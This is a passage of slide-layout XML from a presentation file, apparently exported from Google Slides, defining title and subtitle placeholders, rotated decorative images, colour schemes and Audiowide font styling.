                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2500"/>
              <a:buNone/>
              <a:defRPr sz="2500">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="129" name="Google Shape;129;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1436100" y="-758750"/>
            <a:ext cx="6816174" cy="4220351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="130" name="Google Shape;130;p14"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="-60" r="0" t="537"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-10799997">
            <a:off x="4648077" y="1876429"/>
            <a:ext cx="5772273" cy="3552819"/>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_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="131" name="Shape 131"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="132" name="Google Shape;132;p15"/>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133" name="Google Shape;133;p15"/>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5"/>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5"/>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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="964750" y="1536350"/>
            <a:ext cx="2947500" cy="55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7" name="Google Shape;137;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="350">
            <a:off x="964550" y="2381675"/>
            <a:ext cx="2947500" cy="14046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1400"/>
              <a:buNone/>
              <a:defRPr sz="16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pic>
        <p:nvPicPr>
          <p:cNvPr id="138" name="Google Shape;138;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="20571" r="0" t="8875"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4713096" y="1967777"/>
            <a:ext cx="4497577" cy="3194774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="139" name="Google Shape;139;p15"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="20886" r="0" t="8231"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="4">
            <a:off x="-66675" y="-190497"/>
            <a:ext cx="4563850" cy="3277869"/>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_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="140" name="Shape 140"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="141" name="Google Shape;141;p16"/>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142" name="Google Shape;142;p16"/>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6"/>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6"/>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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="1456400"/>
            <a:ext cx="7704000" cy="25947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chemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
              <a:defRPr b="1" sz="1200"/>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>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46" name="Google Shape;146;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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147" name="Google Shape;147;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5369415" y="-442041"/>
            <a:ext cx="5662423" cy="3506001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="148" name="Google Shape;148;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="-60" r="0" t="537"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-5399997">
            <a:off x="-1828923" y="1781179"/>
            <a:ext cx="5772273" cy="3552819"/>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2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="149" name="Shape 149"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="150" name="Google Shape;150;p17"/>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151" name="Google Shape;151;p17"/>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7"/>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7"/>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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713225" y="1475125"/>
            <a:ext cx="7717500" cy="3128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55" name="Google Shape;155;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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156" name="Google Shape;156;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="73705" l="-60" r="0" t="535"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400003">
            <a:off x="-2495438" y="2110890"/>
            <a:ext cx="5461376" cy="870545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="157" name="Google Shape;157;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="73705" l="-60" r="0" t="535"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-5399997">
            <a:off x="6178013" y="2110891"/>
            <a:ext cx="5461376" cy="87054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3">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="158" name="Shape 158"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="159" name="Google Shape;159;p18"/>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160" name="Google Shape;160;p18"/>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1114">
            <a:off x="726775" y="2183450"/>
            <a:ext cx="2778300" cy="827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solidFill>
                  <a:schemeClr val="accen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62" name="Google Shape;162;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="371">
            <a:off x="726775" y="2991552"/>
            <a:ext cx="2778300" cy="48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3" name="Google Shape;163;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189587" y="3304275"/>
            <a:ext cx="27783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solidFill>
                  <a:schemeClr val="accen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64" name="Google Shape;164;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189587" y="4114925"/>
            <a:ext cx="2778300" cy="48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5" name="Google Shape;165;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5652399" y="2182150"/>
            <a:ext cx="27783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solidFill>
                  <a:schemeClr val="accen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66" name="Google Shape;166;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5652399" y="2991875"/>
            <a:ext cx="2778300" cy="48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7" name="Google Shape;167;p18"/>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8"/>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9" name="Google Shape;169;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="16597" r="0" t="23395"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-1349762" y="941737"/>
            <a:ext cx="5684874" cy="3233001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="170" name="Google Shape;170;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="0" l="23059" r="0" t="16268"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400004">
            <a:off x="5600637" y="400113"/>
            <a:ext cx="4438774" cy="2990847"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705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3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="172" name="Shape 172"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="173" name="Google Shape;173;p19"/>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174" name="Google Shape;174;p19"/>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9"/>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9"/>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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1345325"/>
            <a:ext cx="5943600" cy="38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78" name="Google Shape;178;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1576824"/>
            <a:ext cx="5943600" cy="76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9" name="Google Shape;179;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="2491787"/>
            <a:ext cx="5943600" cy="38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80" name="Google Shape;180;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="2721226"/>
            <a:ext cx="5943600" cy="78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1" name="Google Shape;181;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1593425" y="3636142"/>
            <a:ext cx="5943600" cy="38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82" name="Google Shape;182;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1593425" y="3867801"/>
            <a:ext cx="5943600" cy="76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pic>
        <p:nvPicPr>
          <p:cNvPr id="183" name="Google Shape;183;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="66797" l="-60" r="0" t="535"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-5399997">
            <a:off x="5922077" y="1921653"/>
            <a:ext cx="5772273" cy="1166871"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="184" name="Google Shape;184;p19"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix amt="75000"/>
          </a:blip>
          <a:srcRect b="66797" l="-60" r="0" t="535"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400003">
            <a:off x="-2553948" y="1988316"/>
            <a:ext cx="5772273" cy="1166871"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Google Shape;185;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718150" y="540000"/>
            <a:ext cx="7705800" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>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4_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="186" name="Shape 186"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="187" name="Google Shape;187;p20"/>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188" name="Google Shape;188;p20"/>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0"/>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0"/>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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2109048" y="1553404"/>
            <a:ext cx="2315400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192" name="Google Shape;192;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2109047" y="1915655"/>
            <a:ext cx="2315400" cy="4845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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Google Shape;193;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4708749" y="1553404"/>
            <a:ext cx="2326200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Audiowide"/>
                <a:ea typeface="Audiowide"/>
                <a:cs typeface="Audiowide"/>
                <a:sym typeface="Audiowide"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
